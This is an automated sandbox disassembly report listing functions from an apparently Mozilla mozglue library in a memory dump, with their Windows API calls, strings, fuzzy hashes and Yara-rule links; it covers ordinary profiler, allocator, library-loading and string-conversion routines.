Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction ID: 3142b6849d6ec6b95381f9596ef0e0d97da1d837e232cb8c17506ce709f15651
Opcode Fuzzy Hash: 3aea649bdf82269b74aab9dc918a159452dd4dc8024e20fc0460376b7e1b97a9
Instruction Fuzzy Hash: F311C6743152419BDF10CF57C988A493774E79B325F004629ED0583B41D772B401CA5F

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C69F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction ID: c3c579bf121b4f29216cc944803579b568ea5ae6b2b9047ff900d25c0825af38
Opcode Fuzzy Hash: ddaf6f8b125b3f6f6eed465e4a80a9166bf3288553cff3e0002d544b284c5598
Instruction Fuzzy Hash: 82F0B4752002059FDB006F669C8895E77BDEFCA29EF010415FA0583706CF31A801876E

Function 6C660E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C660DF8), ref: 6C660E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C660EA1
__Init_thread_footer.LIBCMT ref: 6C660EB5
FreeLibrary.KERNEL32 ref: 6C660EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C660E9B
kernel32.dll, xrefs: 6C660E7D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
Instruction ID: 04721a74647996172587f100570ada726f5cd43541baddcb8b94d007b7167caf
Opcode Fuzzy Hash: e11fd40302de7fece80d3faaaf52c34881f3f9f852b453f3802d9b70b70de60d
Instruction Fuzzy Hash: 720146747003928BDF008FABEA94BE233B5E746759F104525EA0182F84DB74B406CA1F

Function 6C69F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C69F598), ref: 6C69F621

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F637
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F645
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8,?,?,00000000,?,6C69F598), ref: 6C69F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C69F62A

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction ID: 0ca6b029334713368cae37ce8458285ea3134e2d024130434b58c9ec30fc0ab5
Opcode Fuzzy Hash: ac30b7a3da0f63cb2ecde626f544fcda8337d725f7d8c642dc04f256e4dc61ae
Instruction Fuzzy Hash: FFF05475200205AFDF006F668C8895A777DEFCA29DF150415FA0583746DB756806876E

Function 6C6905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C68CFAE,?,?,?,6C6531A7), ref: 6C6905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C68CFAE,?,?,?,6C6531A7), ref: 6C690616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6531A7), ref: 6C69061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6531A7), ref: 6C690627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C69061B, 6C690625
<jemalloc>, xrefs: 6C6905FA, 6C69060F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction ID: 48e1536f2f0669c544160619b682af56469d35fc0a8b4f871b052f5e726b8a34
Opcode Fuzzy Hash: 718c23f9e1cf966c788dd71da6affca665d055ee368c1ec450e64d4ade668484
Instruction Fuzzy Hash: 69E08CE2A0101037F6142256BC86DBB761CDBC6134F080039FE0E83341E94ABD1A51FB

Function 6C6605F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction ID: 5d20436572da2bca74fa40327ce16ae1097bfe10773e91a6ef8623a71e3834a3
Opcode Fuzzy Hash: 718b1e7a507a29194bee81f70a1d2deeffb3db7465f21d181ead2f123607c46d
Instruction Fuzzy Hash: 8AA15AB0A016458FDB24CF2AC594A99FBF1BF49304F44866ED44A97B00E731BA85CF99

Function 6C6B14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6B14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6B14E2
GetCurrentThreadId.KERNEL32 ref: 6C6B1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6B15BA
free.MOZGLUE(?), ref: 6C6B16B4

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction ID: aba4de780e88ec0fbd8ae92ed5aa9381c591fd8fdf4d159ca99d83c8d4769e11
Opcode Fuzzy Hash: 84b113b9a73e277b9fd29e08484e4394e3a35ff6a497e3b0073eb4c8ef52548c
Instruction Fuzzy Hash: 2361F572A007009BDB118F25C880BDEB7B5BF8A308F04851DED8A67711EB31E955CB99

Function 6C6ADC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6ADC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6AD38A,?), ref: 6C6ADC6F
free.MOZGLUE(?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6AD38A,?), ref: 6C6ADCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6AD38A,?), ref: 6C6ADD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6AD38A,?), ref: 6C6ADD4A

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction ID: bcadd9162a49f29ceb0e17f71bb7541758fe66ea6d43d186fbb7bff36c009d76
Opcode Fuzzy Hash: e832c0ffbb3be5372cd064647279fbc88c4c6da441537e842909aca23f795383
Instruction Fuzzy Hash: 24416BB5A00605DFCB00CF99C88099AB7F5FF89314B654569DE46ABB11D771FC02CB98

Function 6C68F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C68F480

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

CloseHandle.KERNEL32(00000000), ref: 6C68F555

Part of subcall function 6C6614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C661248,6C661248,?), ref: 6C6614C9
Part of subcall function 6C6614B0: memcpy.VCRUNTIME140(?,6C661248,00000000,?,6C661248,?), ref: 6C6614EF

Part of subcall function 6C65EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C65EEE3

CreateFileW.KERNEL32 ref: 6C68F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C68F523

Strings

\oleacc.dll, xrefs: 6C68F4CB

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction ID: 0d1bc788e9566150df40bd87b32a434fe4a46e126bf0021ca286a0276173a7db
Opcode Fuzzy Hash: e7e48814ea99a76f411752119c71c55213dd58cbadc32e0fce5a34836752ec9b
Instruction Fuzzy Hash: 4541BF706097109FE720DF29D884A9BB7F4AF95318F504A1CF59083690EB70E949CBAB

Function 6C6B74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6B7526
__Init_thread_footer.LIBCMT ref: 6C6B7566
__Init_thread_footer.LIBCMT ref: 6C6B7597

Strings

kernel32.dll, xrefs: 6C6B7557
UnmapViewOfFile2, xrefs: 6C6B7552

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction ID: 70c3812f21271e644d1c9f7080f2d601ef814584af8e9d41c780a69cb21825ee
Opcode Fuzzy Hash: 615ffa97ad8c0de051b7642b4bca49c3847e34a81dded684b7e6253d4862282e
Instruction Fuzzy Hash: 1621373270150197CB248FEAD894ED973B5EB87725F054529E80167B80DB31B9118BBF

Function 6C6BC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6BC0E9), ref: 6C6BC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6BC437
FreeLibrary.KERNEL32(?,6C6BC0E9), ref: 6C6BC44C

Strings

ntdll.dll, xrefs: 6C6BC413
NtQueryVirtualMemory, xrefs: 6C6BC431

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 6C6B75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B748B,?), ref: 6C6B75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6B75D7
FreeLibrary.KERNEL32(?,6C6B748B,?), ref: 6C6B75EC

Strings

RtlNtStatusToDosError, xrefs: 6C6B75D1
ntdll.dll, xrefs: 6C6B75B3

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction ID: 599b689ad59f66e73d5d34581d44cd022478ec4cd9cadc224c2f026cf24e048d
Opcode Fuzzy Hash: 0ed2408e784dd703723be8bc13cc7e9168facbfe92853743f00b8c28fd63a019
Instruction Fuzzy Hash: 8FE0B671600302ABEF006FE3E9C87817AF8EB46359F108425AA15D6650EFB0B452CF5E

Function 6C6B7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6B7592), ref: 6C6B7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C6B7627
FreeLibrary.KERNEL32(?,6C6B7592), ref: 6C6B763C

Strings

ntdll.dll, xrefs: 6C6B7603
NtUnmapViewOfSection, xrefs: 6C6B7621

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction ID: 4077c0c34e0e82244b259c34acabfe4733f0336438e9aebffaac6e4d6d13d704
Opcode Fuzzy Hash: aff42ef36585dfbf2b3ffed05fcd9c9d21b389548d503c9e2ccb9ff195cd6380
Instruction Fuzzy Hash: 67E0B6B0600342ABDF106FA7E8887817AB8EB5A399F014515EA05D2750EBB1B4119F5E

Function 6C6BBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C6BBE49), ref: 6C6BBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C6BBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C6BBE49), ref: 6C6BBF38
RtlReAllocateHeap.NTDLL ref: 6C6BBF83
RtlFreeHeap.NTDLL(6C6BBE49,00000000), ref: 6C6BBFA6

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction ID: 41be5e43559ec2933148f037eb97a796bf2ada86dae306781c2001eb55ed4b4d
Opcode Fuzzy Hash: aa7aa61b06619e0ee9a99d85cb4b4e8ec3ed49fbb90f089a08a381adfc3eb9a2
Instruction Fuzzy Hash: 62517D71B002058FE714CF69CDC0BAAB7A6FFC9314F294629D516A7B94D730F9168B84

Function 6C6A8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8EBF
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?,6C6CD734), ref: 6C6A8F46
free.MOZGLUE(?,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C69B58D,?,?,?,?,?,?,?,6C6CD734,?,?,?), ref: 6C6A8F8F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction ID: 5c8095c7e4d8c3f82490520348ed4036927259d6491a6e53044fc4a20779ecf9
Opcode Fuzzy Hash: 2d5529b490a9ed527ba4d6f3c07105a9ef5ca3ad7d3b13a1296e15702832f637
Instruction Fuzzy Hash: 8251C2B1A012568FEB10CFA4D88066EB7B2FF4D348F15046AD916AB750E731FD06CB99

Function 6C654DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C654F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C654F1E

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
